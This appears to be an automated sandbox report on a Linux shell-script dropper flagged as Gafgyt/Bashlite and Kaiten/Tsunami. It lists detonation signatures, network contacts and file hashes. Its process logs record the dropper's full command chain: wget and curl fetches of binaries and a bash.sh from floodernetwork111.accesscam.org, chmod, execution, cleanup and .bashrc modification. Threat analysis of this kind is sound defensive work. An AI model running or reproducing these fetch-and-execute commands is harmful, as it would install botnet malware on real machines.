Analysis Overview
SHA256
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c
Threat Level: Known bad
The file 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh was found to be: Known bad.
Malicious Activity Summary
Gafgyt/Bashlite
Detected Gafgyt variant
Detects Kaiten/Tsunami Payload
Detects Kaiten/Tsunami payload
Kaiten/Tsunami
File and Directory Permissions Modification
Executes dropped EXE
Creates/modifies environment variables
Modifies Bash startup script
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-23 01:00
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-23 01:00
Reported
2024-10-23 01:02
Platform
debian9-armhf-20240729-en
Max time kernel
149s
Max time network
3s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/m3cr0 | /usr/bin/wget | N/A |
Processes
/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
[/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl
[curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-23 01:00
Reported
2024-10-23 01:02
Platform
debian9-mipsbe-20240611-en
Max time kernel
33s
Max time network
35s
Command Line
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects Kaiten/Tsunami Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Kaiten/Tsunami payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Kaiten/Tsunami
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/m3cr0 | /tmp/m3cr0 | N/A |
| N/A | /tmp/zigaarch64 | /tmp/zigaarch64 | N/A |
| N/A | /tmp/x00x | /tmp/x00x | N/A |
| N/A | /tmp/m3cr0 | /tmp/m3cr0 | N/A |
Creates/modifies environment variables
| Description | Indicator | Process | Target |
| File opened for modification | /root/.bashrc | /tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh | N/A |
Modifies Bash startup script
| Description | Indicator | Process | Target |
| File opened for modification | /root/.bashrc | /tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/bash.sh | /usr/bin/wget | N/A |
| File opened for modification | /tmp/bash.sh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/x00x | /usr/bin/wget | N/A |
| File opened for modification | /tmp/x00x | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zigaarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/zigaarch64 | /usr/bin/curl | N/A |
Processes
/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
[/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl
[curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
/bin/chmod
[chmod +x m3cr0]
/tmp/m3cr0
[./m3cr0]
/bin/rm
[rm -rf m3cr0]
/bin/rm
[rm -rf m3cr0.1]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch64]
/usr/bin/curl
[curl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch64]
/bin/chmod
[chmod +x zigaarch64]
/tmp/zigaarch64
[./zigaarch64]
/bin/rm
[rm -rf zigaarch64]
/bin/rm
[rm -rf zigaarch64.1]
/usr/bin/wget
[wget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x]
/usr/bin/curl
[curl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x]
/bin/chmod
[chmod +x x00x]
/tmp/x00x
[./x00x]
/bin/rm
[rm -rf x00x]
/bin/rm
[rm -rf x00x.1]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/bash.sh]
/usr/bin/curl
[curl -O http://floodernetwork111.accesscam.org:8089/bash.sh]
/bin/rm
[rm -rf bash.sh.1]
/bin/bash
[bash bash.sh]
/usr/bin/wget
[wget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl
[curl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
/bin/chmod
[chmod +x m3cr0]
/tmp/m3cr0
[./m3cr0]
/bin/rm
[rm -rf m3cr0]
/bin/rm
[rm -rf m3cr0.1]
/bin/sleep
[sleep 6000]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
Files
/tmp/m3cr0
| MD5 | 75c00b238bd8105414cbb5d08601ca1a |
| SHA1 | 2a5e59555f348bfd9fa9fc4e3e04338ee4e74576 |
| SHA256 | edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361 |
| SHA512 | a7198035e4dc090cc10d20c19d4f606d5e5d4bba4ea9ab54ed61dbdbe93da16c3a5a85eb4a0c9d39af8dbfc4c578f5a01c5aaa271b5c649e646341ad6ce300b5 |
/tmp/zigaarch64
| MD5 | 48ea3c3566c796e4f74e8e3d6df15cd3 |
| SHA1 | b1ef1574ced09471c26a4c749d5a4ab5ba7942cd |
| SHA256 | 79b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a |
| SHA512 | cb5d342e421089ccba5be87ba64833ee90b78c2954b27719033fa56afbd4aae232b153ba45a7b4664886be8a5961890e54e92349af7e6ef517e7f0a3933928cd |
/tmp/x00x
| MD5 | f042a9131a6d06671e98c1ed1f8d80a8 |
| SHA1 | dd97fac87e8d4a973dc4867524908f3384916f27 |
| SHA256 | a70fdd8fa252beeca41955bee2d4ce3e6e1f6aa60746ee96ec59b96106080a6c |
| SHA512 | 629282e501a77e08295260802427747288af6bca1c0695adb9325b9ce01b9e4b0f4a065c86829eeba5c91cfb66d2965d3de3968e87a3d277471a2216ea2eaafe |
/tmp/bash.sh
| MD5 | 8bbe815474c7d3ed318e958c05e1c95b |
| SHA1 | 36235a707a29d27b01570ef8c973c522f563c15c |
| SHA256 | 469640f9d4de9b71c4720298f7eb585c403f5a13e55e2bedc0da3937dd8b8f5b |
| SHA512 | 137a228141556d1fc6da421fd8bc45b81108908c39e734b235af6dca9b36dee059043f046dd2f670067a10db1e0280a0941f45c0b7ee1c774d1aa7f4cc2e756f |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-23 01:00
Reported
2024-10-23 01:02
Platform
debian9-mipsel-20240226-en
Max time kernel
54s
Max time network
68s
Command Line
Signatures
Detects Kaiten/Tsunami Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Kaiten/Tsunami payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Kaiten/Tsunami
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/m3cr0 | /tmp/m3cr0 | N/A |
| N/A | /tmp/zigaarch64 | /tmp/zigaarch64 | N/A |
| N/A | /tmp/x00x | /tmp/x00x | N/A |
| N/A | /tmp/m3cr0 | /tmp/m3cr0 | N/A |
Creates/modifies environment variables
| Description | Indicator | Process | Target |
| File opened for modification | /root/.bashrc | /tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh | N/A |
Modifies Bash startup script
| Description | Indicator | Process | Target |
| File opened for modification | /root/.bashrc | /tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/x00x | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bash.sh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zigaarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/zigaarch64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x00x | /usr/bin/wget | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bash.sh | /usr/bin/wget | N/A |
Processes
/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
[/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl
[curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
/bin/chmod
[chmod +x m3cr0]
/tmp/m3cr0
[./m3cr0]
/bin/rm
[rm -rf m3cr0]
/bin/rm
[rm -rf m3cr0.1]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch64]
/usr/bin/curl
[curl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch64]
/bin/chmod
[chmod +x zigaarch64]
/tmp/zigaarch64
[./zigaarch64]
/bin/rm
[rm -rf zigaarch64]
/bin/rm
[rm -rf zigaarch64.1]
/usr/bin/wget
[wget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x]
/usr/bin/curl
[curl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x]
/bin/chmod
[chmod +x x00x]
/tmp/x00x
[./x00x]
/bin/rm
[rm -rf x00x]
/bin/rm
[rm -rf x00x.1]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/bash.sh]
/usr/bin/curl
[curl -O http://floodernetwork111.accesscam.org:8089/bash.sh]
/bin/rm
[rm -rf bash.sh.1]
/bin/bash
[bash bash.sh]
/usr/bin/wget
[wget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl
[curl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
/bin/chmod
[chmod +x m3cr0]
/tmp/m3cr0
[./m3cr0]
/bin/rm
[rm -rf m3cr0]
/bin/rm
[rm -rf m3cr0.1]
/bin/sleep
[sleep 6000]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
Files
/tmp/m3cr0
| MD5 | 75c00b238bd8105414cbb5d08601ca1a |
| SHA1 | 2a5e59555f348bfd9fa9fc4e3e04338ee4e74576 |
| SHA256 | edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361 |
| SHA512 | a7198035e4dc090cc10d20c19d4f606d5e5d4bba4ea9ab54ed61dbdbe93da16c3a5a85eb4a0c9d39af8dbfc4c578f5a01c5aaa271b5c649e646341ad6ce300b5 |
/tmp/zigaarch64
| MD5 | 48ea3c3566c796e4f74e8e3d6df15cd3 |
| SHA1 | b1ef1574ced09471c26a4c749d5a4ab5ba7942cd |
| SHA256 | 79b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a |
| SHA512 | cb5d342e421089ccba5be87ba64833ee90b78c2954b27719033fa56afbd4aae232b153ba45a7b4664886be8a5961890e54e92349af7e6ef517e7f0a3933928cd |
/tmp/x00x
| MD5 | 329c40f5253efe5909214b73f9ee0085 |
| SHA1 | 85c0fd22c8a1f860fe047980dc4f94a5ec48278d |
| SHA256 | a166155f1f60f411e71db6a34a38de4e5141e1efcb3a7180d215cf4789fe3106 |
| SHA512 | 9bc97d97b3f708799045811f09f6f159de8ef4a792801528b88e977a67546be0ee52726c71272e07fa510638adc7365a5d174e3ef9f3da54b13868363c0ed873 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-23 01:00
Reported
2024-10-23 01:02
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
131s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/m3cr0 | /usr/bin/wget | N/A |
Processes
/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
[/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl
[curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| GB | 185.125.188.61:443 | N/A | tcp |
| GB | 185.125.188.62:443 | N/A | tcp |
| US | 151.101.1.91:443 | N/A | tcp |
| US | 151.101.1.91:443 | N/A | tcp |
| GB | 195.181.164.14:443 | N/A | tcp |